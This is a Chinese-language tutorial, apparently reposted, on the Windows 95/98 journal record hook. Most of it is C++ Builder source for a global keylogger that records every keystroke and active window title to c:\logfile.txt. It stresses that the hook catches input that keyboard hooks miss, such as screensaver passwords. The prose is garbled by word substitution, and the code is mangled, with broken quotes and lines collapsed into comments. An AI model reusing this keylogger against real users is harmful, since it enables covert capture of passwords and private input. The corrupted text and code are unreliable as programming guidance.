WIN95日志钩子(JournalRecord Hook)的利用

副标题#e#

钩子是WINDOWS中动静处理惩罚机制的一个要点，通过安装各类钩子，应用措施可以或许配置相应的子例程来监督系统里的动静通报以及在这些动静达到方针窗口措施之前处理惩罚它们。钩子的种类许多，每种钩子可以截获并处理惩罚相应的动静，如键盘钩子可以截获键盘动静，鼠标钩子可以截获鼠标动静，外壳钩子可以截获启动和封锁应用措施的动静，日志钩子可以监督和记录输入事件。钩子分为线程专用钩子和全局钩子，线程专用钩子只监督指定的线程，要监督系统中的所有线程，必需用到全局钩子。对付全局钩子，钩子函数必需包括在独立的动态链接库(DLL)中，这样才气被各类相关联的应用措施挪用。在WINDOWS中，日志钩子是个很出格的钩子，它只有全局钩子一种，是键盘鼠标等输入设备的动静在系统动静行列被取出时产生的，并且系统中只能存在一个这样的日志钩子，更重要是，它不必用在动态链接库中，这样可以省却了为安装一个全局钩子而成立一个动态链接库的贫苦。操作日志钩子，我们可以监督各类输入事件，下面的示例可以用来记录键盘的输入，当有按键产生时，自动记录按键行动的日期和时间以及当前激活的窗口名称。本示例在中文WIN98，Borland C++ Builder4中编译通过。

—- 1．新建一个工程，在窗体Form1中安排两个按钮Button1和Button2, CAPTION别离 为“安装日志钩子”和“卸载日志钩子”。

—- 2． 界说如下全局变量：

HHOOK g_hLogHook=NULL;　　 //钩子变量
HWND g_hLastFocus=NULL;　　 
//记录上一次获得核心的窗口句柄
const int KeyPressMask=0x80000000;　//键盘掩码常量
char g_PrvChar;　　　//生存上一次按键值
3．在Button1的OnClick事件中输入：
void __fastcall TForm1::Button1Click(TObject *Sender)
{
　 if　(g_hLogHook==NULL)
　  g_hLogHook = SetWindowsHookEx
(WH_JOURNALRECORD,
　　　　 (HOOKPROC)JournalLogProc,
HInstance,0);　//安装日志钩子
}
4．在Button2的OnClick事件中输入：
void __fastcall TForm1::Button2Click(TObject *Sender)
{
if (g_hLogHook!=NULL)
　 {UnhookWindowsHookEx(g_hLogHook);
　  g_hLogHook=NULL;
　 }　//卸载日志钩子
}
5．输入钩子回调函数：
HOOKPROC JournalLogProc(int iCode,
WPARAM wParam, LPARAM lParam)
{
if (iCode<0) return (HOOKPROC)CallNextHookEx (g_hLogHook,iCode,wParam,lParam); if (iCode="=HC_ACTION)" {EVENTMSG *pEvt="(EVENTMSG" *)lParam; int i; HWND hFocus; //生存当前勾当窗口句柄 char szTitle[256]; //当前窗口名称 char szTime[128]; //生存当前的日期和时间 FILE *stream="fopen(“c:\\logfile.txt”,"a+t");" if (pEvt->message==WM_KEYDOWN)　　 
　　 {int vKey=LOBYTE(pEvt- >paramL);　　// 取得虚拟键值
　　  char ch;
　　  char str[10];
　　  hFocus=GetActiveWindow();　　 
　 //取恰当前勾当窗口句柄
　　  if(g_hLastFocus!=hFocus)　　 
　 //当前勾当窗口是否改变
　　　 {GetWindowText(hFocus,szTitle,256);
　　　  g_hLastFocus=hFocus;
　　　  strcpy(szTime,DateTimeToStr(Now())
.c_str());　//获得当前的日期时间
　　　  fprintf(stream,"%c%s%c%c%s",
10,szTime,32,32,szTitle);　//写入文件
　　　  fprintf(stream,"%c%c",32,32); 
　　　 }
　　  int iShift=GetKeyState(0x10); 
//测试SHIFT,CAPTION,NUMLOCK等键是否按下
　　  int iCapital=GetKeyState(0x14);
　　  int iNumLock=GetKeyState(0x90);
　　  bool bShift=(iShift & KeyPressMask)==KeyPressMask;　 
　　  bool bCapital=(iCapital & 1)==1;
　　  bool bNumLock=(iNumLock & 1)==1;
　　  if (vKey >=48 && vKey<=57) // 数字0-9 if (!bShift) fprintf(stream,"%c",vKey); if (vKey>=65 && vKey<=90) // A-Z a-z {if (!bCapital) if (bShift) ch="vKey;" else ch="vKey+32;" else if (bShift) ch="vKey+32;" else ch="vKey;" fprintf(stream,"%c",ch); } if (vKey>=96 && vKey<=105) // 小键盘0-9 if (bNumLock) fprintf(stream,"%c",vKey-96+48); if (vKey>=186 && vKey<=222) // 其他键 {switch (vKey) {case 186:if (!bShift) ch=";" ; else ch=":" ;break; case 187:if (!bShift) ch="=" ; else ch="+" ;break; case 188:if (!bShift) ch="," ; else ch="<" ;break; case 189:if (!bShift) ch="-" ; else ch="_" ;break; case 190:if (!bShift) ch="." ; else ch=" >" ;break; case 191:if (!bShift) ch="/" ; else ch="?" ;break; case 192:if (!bShift) ch="`" ; else ch="~" ;break; case 219:if (!bShift) ch="[" ; else ch="{" ;break; case 220:if (!bShift) ch="\\" ; else ch="|" ;break; case 221:if (!bShift) ch="]" ; else ch="}" ;break; case 222:if (!bShift) ch="\" '; else ch="\"" ;break; default:ch="n" ;break; } if (ch!="n" ) fprintf(stream,"%c",ch); } // if (wParam>=112 && wParam<=123) // 成果键 [F1]-[F12] if (vKey>=8 && vKey<=46) //偏向键 {switch (vKey) {case 8:strcpy(str,"[BK]");break; case 9:strcpy(str,"[TAB]");break; case 13:strcpy(str,"[EN]");break; case 32:strcpy(str,"[SP]");break; case 33:strcpy(str,"[PU]");break; case 34:strcpy(str,"[PD]");break; case 35:strcpy(str,"[END]");break; case 36:strcpy(str,"[HOME]");break; case 37:strcpy(str,"[LF]");break; case 38:strcpy(str,"[UF]");break; case 39:strcpy(str,"[RF]");break; case 40:strcpy(str,"[DF]");break; case 45:strcpy(str,"[INS]");break; case 46:strcpy(str,"[DEL]");break; default:ch="n" ;break; } if (ch!="n" ) {if (g_PrvChar!="vKey)" {fprintf(stream,"%s",str); g_PrvChar="vKey;" } } } } if (pEvt->message==WM_LBUTTONDOWN || pEvt- >message
==WM_RBUTTONDOWN)
　　　 {hFocus=GetActiveWindow();
　　　  if (g_hLastFocus!=hFocus)
　　　　 {g_hLastFocus=hFocus;
　　　　  GetWindowText(hFocus,szTitle,256);　　　 
　　  strcpy(szTime,DateTimeToStr(Now()).c_str()); 
//获得当前的日期时间
　　  fprintf(stream,"%c%s%c%c%s",
10,szTime,32,32,szTitle);　//写入文件
　　  fprintf(stream,"%c%c",32,32); 
　　　　 }
　　　 }
fclose(stream);
return (HOOKPROC)CallNextHookEx
(g_hLogHook,iCode,wParam,lParam);
}

#p#副标题#e#
#p#分页标题#e#

—- 将工程编译执行后，每当激活一个窗口时，就会把当前窗口名称写入文件c:\logfile.txt中，当有按键时，按键的名称也会写入此文件中，这里的并没有处理惩罚全部的按键，读者可按照需要添加相应的语句。要捕获键盘的按键行动，用键盘钩子(Keyboard Hook)也同样可以实现，可是用日志钩子却比键盘钩子要利便很多。首先，假如要捕获其他应用措施的按键，即做玉成局钩子，键盘钩子必然要单独放在动态链接库中，而日志钩子却不必；其次，在键盘钩子函数获得的键盘按键之前，系统已经处理惩罚过这些输入了，假如系统把这些按键屏蔽掉，键盘钩子就无法检测到它们，譬喻，当输入屏幕掩护措施暗码时，键盘钩子无法检测到用户输入了那些字符，而日志钩子却可以检测到。

—- 无论是哪种钩子， 城市增加系统处理惩罚动静的时间，从而低落系统的机能，我们只有在须要的时候才安装这些钩子，并且尽大概在不需要时移走它们。